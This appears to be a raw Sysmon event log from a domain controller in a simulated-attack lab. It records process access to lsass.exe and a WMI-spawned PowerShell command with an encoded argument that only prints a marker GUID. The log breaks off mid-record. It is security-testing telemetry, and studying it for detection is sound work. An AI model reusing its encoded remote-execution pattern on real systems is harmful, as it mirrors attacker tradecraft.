16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6DD3-603E-D7AA-00000000AD01}44208352C:\Windows\system32\conhost.exe{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.029{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 11241100x80000000000000002242636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.014{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_opv24mo1.lil.ps12021-03-02 16:54:43.014 10341000x80000000000000002242635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.014{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-D7AA-00000000AD01}4420C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000002242634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.014{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5950CE2B270B577C7FA915F4B6A52A96,SHA256=03C151CB047BFA34CE0B7B42EC156F77E0F65E69C2C0087F78F410F077EC9080,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.014{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.998{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.998{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.998{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.998{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.998{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002242626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.012{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EncodedC VwByAGkAdABlAC0ASABvAHMAdAAgAGIAZABhAGMANQAyADEAYQAtAGQAMQAwADQALQA0AGMAMgBkAC0AOQBkAGMANwAtAGMANwBkADQANQBmADMANQAwAGUAYgA1AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002242625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.998{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002243438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:34.677{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local58465- 23542300x80000000000000002243437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:44.717{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94C4969C361EB4FCC276D08ACFC2D7D0,SHA256=1890DCB0511FB0CB069659CD589268159F792504406E96448BC35C599C28A1FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:44.420{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=58641718FAAE1DE8CEE7F7C8D9B2D953,SHA256=0849CA28223DDCFCB5856568373BF4A6CF41F03004815016979A9663B83EDC13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:44.420{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F4E0B797E3DD3497910AF092377DFD0,SHA256=3956AF55F0A323EEDFB4B9EC34754DB72972528258DC7828287690A3B2DBC6BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:44.201{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DB219133BEA9BFCBAD5ECA2C20381296,SHA256=1F1A10723A1D1F2BD2FBD4F10026D6D11B2548272BA6D5D7A04EA51D4554BF31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:45.770{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9252C5B9EAEA0108E76CC8B04DA001B3,SHA256=777CB9180A6F2C81C3169F2272D283F4AA893A40C38AA24E3D4C55428F889C27,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000002243439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-SetValue2021-03-02 16:54:45.045{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d70f84-0xbf508027) 354300x80000000000000002243443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:36.146{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-974.attackrange.local123ntpfalse13.86.101.172-123ntp 23542300x80000000000000002243442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:46.795{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=863AD354D4A49E27B7EC3BCE498640F1,SHA256=1376F0BE49FC854494E5C5B7DBC881AB8FE31A5745B76449DC898BCE92C09821,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:46.029{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1C0F0E2D494CA1FC3FA0D90833DF18B4,SHA256=164D55D42A247F896170C1EF9C0A94F3496B350357BB1B4753D30F084601A991,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:47.811{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0CC76237A447EF57D90E53EDE2DB18F,SHA256=E4FBD36726A8E53B3754426DCD47E07B48E32D89755060C0B174485CF7A1A936,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:47.592{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9B146CFE03038002EE910E62695544B,SHA256=E0D6858A7F2E8F32427C721B8EB761CB29CF07458D1112511F31B650A94285E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:38.350{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60157-false10.0.1.12-8000- 23542300x80000000000000002243446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:48.858{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB681290CEA0EC6063A2DD4C709E68E3,SHA256=180FB5918A905F882A8817933899C53BD317E160057C062FD38945542E00B256,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:49.875{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E373D76CED80F896AEA804691677051,SHA256=39EF1FE1E2820FFA63CB21774C6078076CC261DEDC4758E1F22577B8DF497F1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:49.123{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A62DCA90A97A7C0285DA7A5B62C17032,SHA256=8D1ECC05A5CE426469AA0D5298CE5256AF2E9A803E2B98E6EB15776D1DB739BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:50.889{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E881BED0CE4B6AC41AEB3F5E999F45AB,SHA256=97E02815C4BEACBCF5D1BDFEF854D8EBF6DCC4B04A2B13C83AD8179CBAB3261E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:50.154{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9388F5156A26D127E0D3A9C68EA57707,SHA256=5789E2A769C4DAB2F05F6385468618A998278F383A835BEFE433EF7CF745979A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:39.255{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local57853- 23542300x80000000000000002243457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:51.920{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 